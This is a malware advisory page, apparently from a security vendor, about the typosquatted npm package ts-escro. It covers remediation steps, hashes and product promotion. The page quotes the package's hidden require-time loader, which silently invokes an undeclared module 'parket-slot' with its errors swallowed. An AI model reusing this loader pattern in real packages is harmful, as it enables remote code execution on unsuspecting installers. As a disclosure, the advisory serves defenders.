Which versions of ts-escro are malicious?

The following npm versions of ts-escro are flagged malicious: 0.0.6, 0.0.8. Treat any of these as compromised.

How do I remediate ts-escro if I installed it?

ts-escro is a typosquat — you almost certainly intended a legitimately-named package. Remove ts-escro, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.

I already installed ts-escro — how do I know if it already compromised me?

If ts-escro was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is ts-escro part of a known attack campaign?

Yes — ts-escro is associated with the IN-MAL-2026-007261, IN-MAL-2026-007268 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find ts-escro across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for ts-escro (2 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging ts-escro across your stack and pipelines.

Malicious package

ts-escronpm

Malicious code in ts-escro (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6319

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall ts-escro

What this malware does

The package ships a verbatim copy of MikeMcl/big.js v7.0.1 (same banner, MIT copyright, and API) but is published under a different name (ts-escro). At module load time, big.js line 606 (and big.mjs:606) executes try { const doc = require('parket-slot'); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {}, silently attempting to load and invoke an undeclared third-party module 'parket-slot' with all errors swallowed. The package.json declares no dependency on 'parket-slot'; the only declared dependency is a non-resolvable local filesystem path log-taker: file:../log-taker, which indicates the artifact was published from a staging directory and could not have been produced through normal release engineering. Any consumer that require()s ts-escro triggers the hidden loader. Whoever controls future publishes of the 'parket-slot' name turns every ts-escro install into remote code execution at require-time. The impersonation-of-big.js cover, undeclared loader, swallowed errors, and broken staging dependency together establish a typosquat-loader / stager pattern with clear malicious intent.

Malicious versions

2 flagged

0.0.60.0.8

Indicators of compromise (SHA-256)

26030cb7301c4ff9ea68753581f70290a957e1422b425df7119416fea126c324

9b5a10f4679dd3b65ce4cdfb738644518a1c9836b2ce648277d1bcb449c496e3

Detection & response playbook

Typosquat

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for ts-escro (2 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging ts-escro across your stack and pipelines.
If you installed it — respond
ts-escro is a typosquat — you almost certainly intended a legitimately-named package. Remove ts-escro, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.
Did it already run?
If ts-escro was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks ts-escro before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. ts-escro on npm has been identified as a malicious package (versions 0.0.6, 0.0.8 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007261IN-MAL-2026-007268

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks ts-escro-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring